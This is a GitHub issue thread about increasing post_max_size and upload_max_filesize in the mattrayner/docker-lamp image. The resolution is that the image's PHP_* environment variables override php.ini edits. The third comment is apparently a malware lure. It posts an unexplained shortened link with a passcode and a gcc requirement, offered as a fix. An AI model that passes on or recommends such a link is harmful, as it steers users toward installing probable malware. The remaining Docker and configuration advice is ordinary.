### ISSUE TITLE
How to change post_max_filesize & cie?

### ISSUE THREAD

**Issue by tbarbette** [mattrayner/docker-lamp#144]
Hi all!

I'd like to automatize the famous change to increase post_max_size &cie. I tried this Dockerfile but even if the cat confirms the change is written, the value is ignored and attaching to the container I see the change is not persisted, it's back to 10M.

Any idea?
```
FROM mattrayner/lamp:latest-1804

# Your custom commands
RUN sed -i 's/upload_max_filesize \= [0-9]\+M/upload_max_filesize \= 1024M/g' /etc/php/*/apache2/php.ini
RUN sed -i 's/post_max_size \= [0-9]\+M/post_max_size \= 1024M/g' /etc/php/*/apache2/php.ini
RUN cat /etc/php/8.0/apache2/php.ini | grep post_max_size

CMD ["/run.sh"]

```

**Comment by danilobalderramas** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by pzhlkj6612** [comment]
Hi! 

> the value is ignored and attaching to the container I see the change is not persisted

How did you check it in your container? Please paste your command and result in text.

**Comment by tbarbette** [comment]
Thanks for the help !

```
docker exec -it suspicious_meitner cat /etc/php/8.0/apache2/php.ini | grep post_max_size                                                    <
post_max_size = 10M
```

suspicious_meitner being the name of the container running aside.

**Comment by pzhlkj6612** [comment]
I think you've missed two env vars `PHP_UPLOAD_MAX_FILESIZE` and `PHP_POST_MAX_SIZE`:

https://github.com/mattrayner/docker-lamp/blob/24c620372a4e89afc109126485b7ced5245a77eb/1804/Dockerfile#L81-L83

These two env vars will overwrite the value in the INI file:

https://github.com/mattrayner/docker-lamp/blob/24c620372a4e89afc109126485b7ced5245a77eb/supporting_files/run.sh#L19-L29

Hence, to change the config, your Dockerfile should look like this:

```Dockerfile
FROM mattrayner/lamp:latest-1804

# Your custom commands
ENV PHP_UPLOAD_MAX_FILESIZE=1024M
ENV PHP_POST_MAX_SIZE=1024M

CMD ["/run.sh"]

```

See also: [LegacyKeyValueFormat | Docker Docs](https://docs.docker.com/reference/build-checks/legacy-key-value-format/)

**Comment by tbarbette** [comment]
Ah yes indeed ! Did not see the env in the doc :) Sorry !

**Comment by pzhlkj6612** [comment]
Hey, may I ask what "cie" is? I googled but didn't found something looks correct.

**Comment by tbarbette** [comment]
Just a frenglish of "etc" :)

**Comment by pzhlkj6612** [comment]
> Just a frenglish of "etc" :)

New knowledge acquired :)
